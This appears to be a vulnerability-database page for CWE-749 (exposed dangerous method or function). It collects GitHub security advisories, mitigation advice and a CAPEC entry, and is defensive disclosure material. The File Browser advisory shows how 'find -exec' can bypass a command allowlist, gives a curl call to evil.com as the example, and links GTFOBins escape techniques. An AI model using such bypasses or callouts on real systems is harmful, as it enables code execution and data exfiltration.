CWE-749
AllowedExposed Dangerous Method or Function
Abstraction: Base · Status: Incomplete
The product provides an Applications Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted.
304 vulnerabilities reference this CWE, most recent first.
GHSA-2CW3-G6HP-3XJ8
Vulnerability from github – Published: 2024-03-21 15:31 – Updated: 2024-03-21 15:31In JetBrains TeamCity before 2023.11 users with access to the agent machine might obtain permissions of the user running the agent process
{
"affected": [],
"aliases": [
"CVE-2024-29880"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-03-21T14:15:10Z",
"severity": "MODERATE"
},
"details": "In JetBrains TeamCity before 2023.11 users with access to the agent machine might obtain permissions of the user running the agent process",
"id": "GHSA-2cw3-g6hp-3xj8",
"modified": "2024-03-21T15:31:54Z",
"published": "2024-03-21T15:31:54Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29880"
},
{
"type": "WEB",
"url": "https://www.jetbrains.com/privacy-security/issues-fixed"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-2F37-H53V-66VQ
Vulnerability from github – Published: 2024-04-09 15:30 – Updated: 2024-04-09 15:30A denial of service vulnerability exists in the TDDP functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926. A specially crafted series of network requests can lead to reset to factory settings. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability.
{
"affected": [],
"aliases": [
"CVE-2023-49074"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-09T15:15:28Z",
"severity": "HIGH"
},
"details": "A denial of service vulnerability exists in the TDDP functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926. A specially crafted series of network requests can lead to reset to factory settings. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability.",
"id": "GHSA-2f37-h53v-66vq",
"modified": "2024-04-09T15:30:37Z",
"published": "2024-04-09T15:30:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49074"
},
{
"type": "WEB",
"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1861"
},
{
"type": "WEB",
"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1861"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-2G8M-X62G-5M9W
Vulnerability from github – Published: 2025-12-24 00:30 – Updated: 2025-12-24 00:30RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27659.
{
"affected": [],
"aliases": [
"CVE-2025-14490"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-23T22:15:50Z",
"severity": "HIGH"
},
"details": "RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27659.",
"id": "GHSA-2g8m-x62g-5m9w",
"modified": "2025-12-24T00:30:16Z",
"published": "2025-12-24T00:30:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14490"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1166"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-2HMQ-H49V-WQM8
Vulnerability from github – Published: 2025-02-14 15:31 – Updated: 2026-06-01 15:30Exposed Dangerous Method or Function vulnerability in PTT Inc. HGS Mobile App allows Manipulating User-Controlled Variables.This issue affects HGS Mobile App: before 6.5.0.
{
"affected": [],
"aliases": [
"CVE-2024-12651"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-02-14T14:15:31Z",
"severity": "HIGH"
},
"details": "Exposed Dangerous Method or Function vulnerability in PTT Inc. HGS Mobile App allows Manipulating User-Controlled Variables.This issue affects HGS Mobile App: before 6.5.0.",
"id": "GHSA-2hmq-h49v-wqm8",
"modified": "2026-06-01T15:30:32Z",
"published": "2025-02-14T15:31:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12651"
},
{
"type": "WEB",
"url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0034"
},
{
"type": "WEB",
"url": "https://www.usom.gov.tr/bildirim/tr-25-0034"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-2PGP-5W4W-9255
Vulnerability from github – Published: 2023-09-11 12:30 – Updated: 2024-04-04 07:35Govee Home app has unprotected access to WebView component which can be opened by any app on the device. By sending an URL to a specially crafted site, the attacker can execute JavaScript in context of WebView or steal sensitive user data by displaying phishing content.
{
"affected": [],
"aliases": [
"CVE-2023-3612"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-09-11T10:15:07Z",
"severity": "HIGH"
},
"details": "Govee Home app has unprotected access to WebView component which can be opened by any app on\u00a0the device. By sending an URL to a specially crafted site, the attacker can execute JavaScript in context of WebView or\u00a0steal sensitive user data by displaying phishing content. ",
"id": "GHSA-2pgp-5w4w-9255",
"modified": "2024-04-04T07:35:00Z",
"published": "2023-09-11T12:30:17Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3612"
},
{
"type": "WEB",
"url": "https://www.sk-cert.sk/sk/threat/sk-cert-bezpecnostne-varovanie-v20230811-10"
},
{
"type": "WEB",
"url": "https://www.sk-cert.sk/threat/sk-cert-bezpecnostne-varovanie-v20230811-10"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-2W4W-QVP3-4G7G
Vulnerability from github – Published: 2025-05-21 15:30 – Updated: 2025-11-03 21:33A USB backdoor feature can be triggered by attaching a USB drive that contains specially crafted "salia.ini" files. The .ini file can contain several "commands" that could be exploited by an attacker to export or modify the device configuration, enable an SSH backdoor or perform other administrative actions. Ultimately, this backdoor also allows arbitrary execution of OS commands.
{
"affected": [],
"aliases": [
"CVE-2025-48415"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-21T13:16:02Z",
"severity": "MODERATE"
},
"details": "A USB backdoor feature can be triggered by attaching a USB drive that contains specially crafted \"salia.ini\" files. The .ini file can contain several \"commands\" that could be exploited by an attacker to export or modify the device configuration, enable an SSH backdoor\u00a0 or perform other administrative actions. Ultimately, this backdoor also allows arbitrary execution of OS commands.",
"id": "GHSA-2w4w-qvp3-4g7g",
"modified": "2025-11-03T21:33:57Z",
"published": "2025-05-21T15:30:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48415"
},
{
"type": "WEB",
"url": "https://r.sec-consult.com/echarge"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2025/May/23"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-368F-RF6P-3H4R
Vulnerability from github – Published: 2022-05-24 16:49 – Updated: 2023-03-03 21:30IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 11.1 could allow an authenticated user to execute a function that would cause the server to crash. IBM X-Force ID: 162714.
{
"affected": [],
"aliases": [
"CVE-2019-4386"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-07-01T15:15:00Z",
"severity": "MODERATE"
},
"details": "IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 11.1 could allow an authenticated user to execute a function that would cause the server to crash. IBM X-Force ID: 162714.",
"id": "GHSA-368f-rf6p-3h4r",
"modified": "2023-03-03T21:30:18Z",
"published": "2022-05-24T16:49:11Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-4386"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/162174"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10886809"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/109019"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-3F63-W59M-X8FF
Vulnerability from github – Published: 2023-10-03 09:32 – Updated: 2023-11-02 12:30cashIT! - serving solutions. Devices from "PoS/ Dienstleistung, Entwicklung & Vertrieb GmbH" to 03.A06rks 2023.02.37 are affected by an unauthenticated remote code execution vulnerability. This vulnerability can be triggered by an HTTP endpoint exposed to the network.
{
"affected": [],
"aliases": [
"CVE-2023-3656"
],
"database_specific": {
"cwe_ids": [
"CWE-749",
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-10-03T08:15:35Z",
"severity": "CRITICAL"
},
"details": "cashIT! - serving solutions. Devices from \"PoS/ Dienstleistung, Entwicklung \u0026 Vertrieb GmbH\" to 03.A06rks 2023.02.37 are affected by an unauthenticated remote code execution vulnerability. This vulnerability can be triggered by an HTTP endpoint exposed to the network.",
"id": "GHSA-3f63-w59m-x8ff",
"modified": "2023-11-02T12:30:16Z",
"published": "2023-10-03T09:32:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3656"
},
{
"type": "WEB",
"url": "https://doi.org/10.35011/ww2q-d522"
},
{
"type": "WEB",
"url": "https://www.cashit.at"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-3MQV-2377-W337
Vulnerability from github – Published: 2024-05-03 03:31 – Updated: 2024-05-03 03:31Voltronic Power ViewPower UpsScheduler Exposed Dangerous Method Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Voltronic Power ViewPower. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the UpsScheduler class. The issue results from an exposed dangerous method. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-22036.
{
"affected": [],
"aliases": [
"CVE-2023-51583"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-03T03:16:18Z",
"severity": "CRITICAL"
},
"details": "Voltronic Power ViewPower UpsScheduler Exposed Dangerous Method Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Voltronic Power ViewPower. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the UpsScheduler class. The issue results from an exposed dangerous method. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-22036.",
"id": "GHSA-3mqv-2377-w337",
"modified": "2024-05-03T03:31:07Z",
"published": "2024-05-03T03:31:07Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51583"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-23-1888"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-3Q2W-42MV-CPH4
Vulnerability from github – Published: 2025-06-27 15:19 – Updated: 2026-06-09 18:40[!NOTE] This feature has been disabled by default for all installations from v2.33.8 onwards, including for existent installations. To exploit this vulnerability, the instance administrator must turn on a feature and ignore all the warnings about known vulnerabilities. We're publishing this new advisory to make it clear that all vulnerabilities concerning this feature are disclosed.
For more information about tracking vulnerability issues related to the Command Execution features, check https://github.com/filebrowser/filebrowser/issues/5199.
Summary
The Command Execution feature of File Browser only allows the execution of shell command which have been predefined on a user-specific allowlist. Many tools allow the execution of arbitrary different commands, rendering this limitation void.
Impact
The concrete impact depends on the commands being granted to the attacker, but the large number of standard commands allowing the execution of subcommands makes it likely that every user having the Execute commands permissions can exploit this vulnerability. Everyone who can exploit it will have full code execution rights with the uid of the server process.
Vulnerability Description
Many Linux commands allow the execution of arbitrary different commands. For example, if a user is authorized to run only the find command and nothing else, this restriction can be circumvented by using the -exec flag.
Some common commands having the ability to launch external commands and which are included in the official container image of Filebrowser are listed below. The website https://gtfobins.github.io gives a comprehensive overview:
- https://gtfobins.github.io/gtfobins/cpio
- https://gtfobins.github.io/gtfobins/find
- https://gtfobins.github.io/gtfobins/sed
- https://gtfobins.github.io/gtfobins/git
- https://gtfobins.github.io/gtfobins/env
As a prerequisite, an attacker needs an account with the Execute Commands permission and some permitted commands.
Proof of Concept
The following screenshot demonstrates, how this can be used to issue a network call to an external server:
Recommended Countermeasures
Until this issue is fixed, we recommend to completely disable Execute commands for all accounts. Since the command execution is an inherently dangerous feature that is not used by all deployments, it should be possible to completely disable it in the application's configuration.
The prlimit command can be used to prevent the execution of subcommands:
$ find . -exec curl http://evil.com {} \;
<HTML>
<HEAD>
[...]
$ prlimit --nproc=0 find . -exec curl http://evil.com {} \;
find: cannot fork: Resource temporarily unavailable
It should be prepended to any command executed in the context of the application. prlimit can be used for containerized deployments as well as for bare-metal ones.
WARNING: Note that this does prevent any unexpected behavior from the authorized command. For example, the find command can also delete files directly via its -delete flag.
As a defense-in-depth measure, Filebrowser should provide an additional container image based on a distroless base image.
Timeline
2025-03-26Identified the vulnerability in version 2.32.02025-06-25Uploaded advisories to the project's GitHub repository2025-06-25CVE ID assigned by GitHub2025-06-25A patch version has been pushed to disable the feature for all existent installations, and making it opt-in. A warning has been added to the documentation and is printed on the console if the feature is enabled. Due to the project being in maintenance-only mode, the bug has not been fixed. Fix is tracked on https://github.com/filebrowser/filebrowser/issues/5199.
References
Credits
- Mathias Tausig (SBA Research)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/filebrowser/filebrowser/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.33.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-52903"
],
"database_specific": {
"cwe_ids": [
"CWE-183",
"CWE-749",
"CWE-77",
"CWE-88"
],
"github_reviewed": true,
"github_reviewed_at": "2025-06-27T15:19:16Z",
"nvd_published_at": "2025-06-26T19:15:21Z",
"severity": "HIGH"
},
"details": "\u003e [!NOTE]\n\u003e **This feature has been disabled by default for all installations from v2.33.8 onwards, including for existent installations**. To exploit this vulnerability, the instance administrator must turn on a feature and ignore all the warnings about known vulnerabilities. We\u0027re publishing this new advisory to make it clear that all vulnerabilities concerning this feature are disclosed.\n\u003e\n\u003e For more information about tracking vulnerability issues related to the Command Execution features, check https://github.com/filebrowser/filebrowser/issues/5199.\n\n## Summary ##\n\nThe *Command Execution* feature of File Browser only allows the execution of shell command which have been predefined on a user-specific allowlist. Many tools allow the execution of arbitrary different commands, rendering this limitation void.\n\n## Impact ##\n\nThe concrete impact depends on the commands being granted to the attacker, but the large number of standard commands allowing the execution of subcommands makes it likely that every user having the `Execute commands` permissions can exploit this vulnerability. Everyone who can exploit it will have full code execution rights with the *uid* of the server process.\n\n## Vulnerability Description ##\n\nMany Linux commands allow the execution of arbitrary different commands. For example, if a user is authorized to run only the `find` command and nothing else, this restriction can be circumvented by using the `-exec` flag.\n\nSome common commands having the ability to launch external commands and which are included in the official container image of Filebrowser are listed below. The website \u003chttps://gtfobins.github.io\u003e gives a comprehensive overview:\n\n* \u003chttps://gtfobins.github.io/gtfobins/cpio\u003e\n* \u003chttps://gtfobins.github.io/gtfobins/find\u003e\n* \u003chttps://gtfobins.github.io/gtfobins/sed\u003e\n* \u003chttps://gtfobins.github.io/gtfobins/git\u003e\n* \u003chttps://gtfobins.github.io/gtfobins/env\u003e\n\nAs a prerequisite, an attacker needs an account with the `Execute Commands` permission and some permitted commands.\n\n## Proof of Concept ##\n\nThe following screenshot demonstrates, how this can be used to issue a network call to an external server:\n\n\n\n## Recommended Countermeasures ##\n\nUntil this issue is fixed, we recommend to completely disable `Execute commands` for all accounts. Since the command execution is an inherently dangerous feature that is not used by all deployments, it should be possible to completely disable it in the application\u0027s configuration.\n\nThe `prlimit` command can be used to prevent the execution of subcommands:\n\n```bash\n$ find . -exec curl http://evil.com {} \\;\n\u003cHTML\u003e\n\u003cHEAD\u003e\n[...]\n\n$ prlimit --nproc=0 find . -exec curl http://evil.com {} \\;\nfind: cannot fork: Resource temporarily unavailable\n```\n\nIt should be prepended to any command executed in the context of the application. `prlimit` can be used for containerized deployments as well as for bare-metal ones.\n\nWARNING: Note that this does prevent any unexpected behavior from the authorized command. For example, the `find` command can also delete files directly via its `-delete` flag.\n\nAs a defense-in-depth measure, Filebrowser should provide an additional container image based on a *distroless* base image.\n\n## Timeline ##\n\n* `2025-03-26` Identified the vulnerability in version 2.32.0\n* `2025-06-25` Uploaded advisories to the project\u0027s GitHub repository\n* `2025-06-25` CVE ID assigned by GitHub\n* `2025-06-25` A patch version has been pushed to disable the feature for all existent installations, and making it **opt-in**. A warning has been added to the documentation and is printed on the console if the feature is enabled. Due to the project being in maintenance-only mode, the bug has not been fixed. Fix is tracked on https://github.com/filebrowser/filebrowser/issues/5199.\n\n## References ##\n\n* [prlimit](https://manpages.debian.org/bookworm/util-linux/prlimit.1.en.html)\n* [\"Distroless\" Container Images.](https://github.com/GoogleContainerTools/distroless)\n* [Original Advisory](https://github.com/sbaresearch/advisories/tree/public/2025/SBA-ADV-20250326-02_Filebrowser_Shell_Commands_Can_Spawn_Other_Commands)\n \n## Credits ##\n\n* Mathias Tausig ([SBA Research](https://www.sba-research.org/))",
"id": "GHSA-3q2w-42mv-cph4",
"modified": "2026-06-09T18:40:07Z",
"published": "2025-06-27T15:19:16Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-3q2w-42mv-cph4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52903"
},
{
"type": "WEB",
"url": "https://github.com/filebrowser/filebrowser/issues/5199"
},
{
"type": "WEB",
"url": "https://github.com/filebrowser/filebrowser/commit/4d830f707fc4314741fd431e70c2ce50cd5a3108"
},
{
"type": "WEB",
"url": "https://github.com/GoogleContainerTools/distroless"
},
{
"type": "PACKAGE",
"url": "https://github.com/filebrowser/filebrowser"
},
{
"type": "WEB",
"url": "https://github.com/sbaresearch/advisories/tree/public/2025/SBA-ADV-20250326-02_Filebrowser_Shell_Commands_Can_Spawn_Other_Commands"
},
{
"type": "WEB",
"url": "https://manpages.debian.org/bookworm/util-linux/prlimit.1.en.html"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2025-3786"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "filebrowser Allows Shell Commands to Spawn Other Commands"
}
Mitigation
If you must expose a method, make sure to perform input validation on all arguments, limit access to authorized parties, and protect against all possible vulnerabilities.
Mitigation
Strategy: Attack Surface Reduction
- Identify all exposed functionality. Explicitly list all functionality that must be exposed to some user or set of users. Identify which functionality may be:
- Ensure that the implemented code follows these expectations. This includes setting the appropriate access modifiers where applicable (public, private, protected, etc.) or not marking ActiveX controls safe-for-scripting.
- accessible to all users
- restricted to a small set of privileged users
- prevented from being directly accessible at all
CAPEC-500: WebView Injection
An adversary, through a previously installed malicious application, injects code into the context of a web page displayed by a WebView component. Through the injected code, an adversary is able to manipulate the DOM tree and cookies of the page, expose sensitive information, and can launch attacks against the web application from within the web page.